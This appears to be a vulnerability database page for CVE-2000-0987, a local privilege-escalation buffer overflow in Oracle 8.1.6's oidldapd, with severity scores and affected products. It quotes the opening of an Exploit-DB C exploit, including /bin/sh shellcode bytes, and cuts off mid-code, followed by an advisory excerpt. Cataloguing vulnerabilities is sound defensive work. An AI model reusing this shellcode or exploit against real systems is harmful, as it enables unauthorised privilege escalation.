CVE-2000-0987
published 2000-12-19CVE-2000-0987: Buffer overflow in oidldapd in Oracle 8.1.6 allow local users to gain privileges via a long "connect" command line parameter.
PriorityP415medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
1.36%
68.3th percentile
Buffer overflow in oidldapd in Oracle 8.1.6 allow local users to gain privileges via a long "connect" command line parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | internet_directory | — | — |
| oracle | oracle8i | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Oracle (oidldapd connect) - Local Command Line Overflow
exploitdb·2000-11-16
CVE-2000-0987 Oracle (oidldapd connect) - Local Command Line Overflow
Oracle (oidldapd connect) - Local Command Line Overflow
---
/*
Exploit Code for oidldapd in Oracle 8.1.6 (8ir2) for Linux.
I tested in RH 6.2 and 6.1. This code is a bullshit (i know
please no comments about ;-)).
If someone exports this to Sparc please tell me.
synopsis: buffer overflow in oidldapd
impact: any user gain euid=oracle.
Dedicated to PlazaSite guys. Klink Klink Team. Panxeta, Entrophy and others.
*/
#include
#include
#define DEFAULT_OFFSET 13
#define DEFAULT_BUFFER_SIZE 700
#define NOP 0x90
#define ORACLE_HOME "/usr/local/oracle/app/oracle/product/8.1.6"
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
Exploit-DB
Oracle Internet Directory 2.0.6 - oidldap
exploitdb·2000-10-18
CVE-2000-0987 Oracle Internet Directory 2.0.6 - oidldap
Oracle Internet Directory 2.0.6 - oidldap
---
// source: https://www.securityfocus.com/bid/1828/info
Oracle Internet Directory 2.0.6 is a pre-alpha development release, available as both an addon package and in the Oracle Database Software release 8.1.6. A vulnerability has been found in the oidldap binary within the package.
A buffer overflow exists in the oidldap binary, which is setuid oracle. When executed on the command line, the oidldap binary performs an unsafe check of the ORACLE_HOME environment variable. It is possible for a malicous user to execute shell code through the ORACLE_HOME environment variable, allowing the user to inherit an euid of oracle. In a stock installation of Oracle 8.1.6, this could create a scenario which would allow a local user to compromise the integr
No writeups or analysis indexed.
2000-12-19
Published